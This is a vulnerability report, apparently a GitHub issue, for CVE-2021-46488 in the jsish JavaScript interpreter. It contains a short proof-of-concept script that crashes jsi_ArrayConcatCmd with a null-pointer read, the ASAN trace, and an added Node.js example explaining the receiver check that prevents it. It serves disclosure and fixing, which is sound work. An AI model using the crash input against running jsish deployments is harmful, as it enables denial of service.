CVE-2021-46488: SEGV src/jsiArray.c:311 in jsi_ArrayConcatCmd · Issue #68 · pcmacdon/jsish
Jsish v3.5.0 was discovered to contain a SEGV vulnerability via jsi_ArrayConcatCmd at src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS).
Jsish revision
Commit: 9fa798e
Version: v3.5.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
export CFLAGS='-fsanitize=address'
make
Test case
var i = 0;
function JSEtest() { arr[arr[1000] = 3] = 3; i++; }
var arr = new Array(10); arr[2] = 2; arr.concat(JSEtest);
(arr.reduceRight(arr.concat), 0, '1');
Execution steps & Output
$ ./jsish/jsish poc.js
ASAN:DEADLYSIGNAL
==121369==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x563e6997e690 bp 0x00000000000a sp 0x7ffcb3c19980 T0)
==121369==The signal is caused by a READ memory access.
==121369==Hint: address points to the zero page.
    #0 0x563e6997e68f in jsi_ArrayConcatCmd src/jsiArray.c:311
    #1 0x563e69943818 in jsi_FuncCallSub src/jsiProto.c:244
    #2 0x563e698c0fec in jsi_FunctionInvoke src/jsiFunc.c:777
    #3 0x563e698c0fec in Jsi_FunctionInvoke src/jsiFunc.c:789
    #4 0x563e69985851 in jsi_ArrayReduceSubCmd src/jsiArray.c:641
    #5 0x563e69985851 in jsi_ArrayReduceRightCmd src/jsiArray.c:672
    #6 0x563e69943818 in jsi_FuncCallSub src/jsiProto.c:244
    #7 0x563e69c0d71a in jsiFunctionSubCall src/jsiEval.c:796
    #8 0x563e69c0d71a in jsiEvalFunction src/jsiEval.c:837
    #9 0x563e69c0d71a in jsiEvalCodeSub src/jsiEval.c:1264
    #10 0x563e69c2115e in jsi_evalcode src/jsiEval.c:2204
    #11 0x563e69c25274 in jsi_evalStrFile src/jsiEval.c:2665
    #12 0x563e6991466a in Jsi_Main src/jsiInterp.c:936
    #13 0x563e6a11903a in jsi_main src/main.c:47
    #14 0x7fde1e7babf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    #15 0x563e698a8969 in _start (/usr/local/bin/jsish+0xe8969)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiArray.c:311 in jsi_ArrayConcatCmd
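The trace above shows the array's own concat implementation (frame #0) being entered from reduceRight (frames #5 to #1), i.e. the built-in was invoked as the reducer callback rather than as a method on the array, and the faulting read is at address 0x8, a small offset from NULL. The report does not identify the exact defect at src/jsiArray.c:311, so the following is an added example, not code from the report or from the jsish project: it runs under Node.js, a spec-compliant engine, and shows what a reducer callback actually receives as its receiver (`this` is undefined), why the page's exact PoC line never invokes the callback on a sparse single-element array in a compliant engine (no initial value means the lone element becomes the accumulator), and how a compliant concat reacts to a missing receiver (TypeError, not a crash). `safeConcat` is a hypothetical JavaScript stand-in for the receiver check a native array-method handler needs; the sparse array is constructed input mirroring the PoC.

```javascript
// Added example (not from the jsish issue or project). Runs under Node.js.

// Record exactly what Array.prototype.reduceRight hands its callback.
// Constructed input mirroring the PoC: length 10, only index 2 populated.
function captureReduceRightCalls() {
  const arr = new Array(10);
  arr[2] = 2;
  const calls = [];
  arr.reduceRight(function (acc, cur, idx, source) {
    'use strict'; // strict callback: an absent receiver stays undefined
    calls.push({
      receiverIsUndefined: this === undefined,
      acc,
      cur,
      idx,
      sourceIsArr: source === arr,
    });
    return acc;
  }, 0);
  return calls; // holes are skipped, so exactly one call for index 2
}

// Pass Array.prototype.concat itself as the reducer, as the PoC does, and
// report how the engine reacts. withInitialValue controls whether the
// callback is invoked at all: without an initial value the single present
// element becomes the accumulator and concat is never called.
function concatAsReducer(withInitialValue) {
  const arr = new Array(10);
  arr[2] = 2;
  try {
    const result = withInitialValue
      ? arr.reduceRight(arr.concat, 0) // concat runs with this === undefined
      : arr.reduceRight(arr.concat);   // no callback invocation, returns 2
    return { threw: false, result };
  } catch (e) {
    return { threw: true, name: e.name, message: e.message };
  }
}

// Hypothetical stand-in for the guard a native array-method handler needs:
// validate the receiver before dereferencing anything derived from it.
// Mirrors the ToObject(this) step that makes a compliant concat throw.
function safeConcat(receiver, ...items) {
  if (receiver === null || receiver === undefined) {
    throw new TypeError('concat called on null or undefined');
  }
  const base = Array.isArray(receiver) ? receiver : [receiver];
  return base.concat(...items);
}
```

Running `concatAsReducer(true)` under Node.js yields a TypeError from concat's receiver check; that is the behaviour a native implementation must reproduce, since reduceRight (and any other callback-taking API) can hand a built-in an arbitrary receiver, and a handler that assumes "this is an array" will read through a NULL or wrong-typed pointer exactly as the ASAN trace shows.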
Credits: Found by OWL337 team.